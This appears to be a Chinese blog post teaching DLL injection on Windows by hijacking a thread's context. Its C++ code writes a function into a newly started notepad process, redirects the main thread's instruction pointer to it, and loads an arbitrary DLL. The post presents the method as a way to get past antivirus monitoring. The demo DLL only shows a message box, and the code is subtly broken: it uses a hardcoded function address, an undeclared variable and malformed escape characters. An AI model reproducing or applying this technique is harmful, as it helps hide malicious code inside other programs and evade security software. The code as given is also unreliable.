1. 程式人生 > >windows下注入dll的技術(windows下注入dll的技術)

windows下注入dll的技術(windows下注入dll的技術)

目前windows下注入dll的技術大體上就是兩種
1:鉤子 SetWindowsHook
2:建立遠端執行緒 CreateRemoteThread
儘管都能實現遠端注入dll,但都難逃防毒軟體的法眼,特別是 CreateRemoteThread
一般都被防毒軟體監控的很牢,這裡提供一個巧妙的方法能夠利用目標程序(確切地說是執行緒)
自己主動呼叫LoadLibrary裝載dll.

我們想一想,windows下vc偵錯程式可以除錯正在執行的程序,功能很是強大,那可不可以
借鑑偵錯程式的機理呢?完全可以,偵錯程式的機理大致分為以下幾步:
1:OpenProcess() 獲取目標程序句炳,擁有除錯許可權(我們這裡不需要用這個許可權)
2:SuspendThread() 掛起目標程序的主執行緒
3:GetThreadContext(), SetThreadContext() 讀寫目標執行緒的當前CPU上下文資訊。
4:ReadProcessMemory(), WriteProcessMemory() 讀寫目標程序記憶體資料。

好了,這裡面就給我們提供了很好的方法,是什麼?對了就是 GetThreadContext(), SetThreadContext() 
這兩個API函式,它倆不但是哥們,也是我們最好的朋友(親一下)。
下面給出程式碼:
1:我們自己的dll
  BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved
  {
  //很簡單,我們不搞破壞,緊緊彈個資訊框。
::MessageBox(0,"嘿嘿嘿!!!",0,0);
  return TRUE;
  }
2:我們的主程式
  typedef HMODULE (__stdcall *pLoadLibrary)(LPCSTR lpLibFileName);
  void test()
  {
  //不能直接使用常量字串,否則會引起目標程序讀取資料異常。
char dllname[] = {'c',':','//','d','l','l','t','e','s','t','.','d','l','l','/0'};
  //必須用2088770939這個 LoadLibrary 函式的絕對地址(在我的xp下是這個地址,使用時應該在自己的windows下獲取)
pLoadLibrary pFunc = pLoadLibrary(2088770939);
  //呼叫LoadLibrary,因為LoadLibrary函式在windows下每個程序中絕對地址都是一樣的。
pFunc(dllname);
return;
  }
  //以下是控制注入的函式
  #include <windows.h>
  void Inject()
  {
  CONTEXT context;
  memset(&context,0,sizeof(context));
context.ContextFlags = CONTEXT_CONTROL;
PROCESS_INFORMATION piProcInfo; 
  STARTUPINFO siStartInfo;  
  ZeroMemory( &piProcInfo, sizeof(PROCESS_INFORMATION) );
  ZeroMemory( &siStartInfo, sizeof(STARTUPINFO));
  siStartInfo.cb = sizeof(STARTUPINFO); 
  BOOL bOk = CreateProcess(NULL, 
  "C://WINDOWS//system32//notepad.exe", // command line 
  NULL, // process security attributes 
  NULL, // primary thread security attributes 
  FALSE, // handles are inherited 
  0, // creation flags 
  NULL, // use parent's environment 
"C://WINDOWS//system32//",// use parent's current directory 
  &siStartInfo, // STARTUPINFO pointer 
  &piProcInfo); // receives PROCESS_INFORMATION
   
  ::WaitForInputIdle(piProcInfo.hProcess,-1);
  //為目標程序分配空間
  LPVOID pRemote = ::VirtualAllocEx(piProcInfo.hProcess,0,4096,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
  DWORD dWriten = 0,id = 0;
  //將test函式寫入目標程序
  ::WriteProcessMemory(piProcInfo.hProcess,pRemote,(LPVOID)test,1024,&dWriten);
  //掛起目標程序的主執行緒
  ::SuspendThread(piProcInfo.hThread);
  //獲取目標執行緒的CPU上下文資訊
  i = ::GetThreadContext(piProcInfo.hThread,&context);
  //更改Eip指令為我們拷貝好的test函式
  context.Eip = (long)pRemote;
  //設定目標執行緒的CPU上下文資訊
  i = ::SetThreadContext(piProcInfo.hThread,&context);
  //喚醒目標執行緒,
  ::ResumeThread(piProcInfo.hThread);
  //目標執行緒此時就會執行我們的test函數了,執行完後還會繼續沿著
  //自己原先的程式碼序列執行下去。
return 0;
  }

以上程式碼都經過測試,的確比較“不動聲色”的完成了dll的注入,防毒軟體
也不會有所覺察(除非定時掃描程序dll模組。那系統會比較慢)。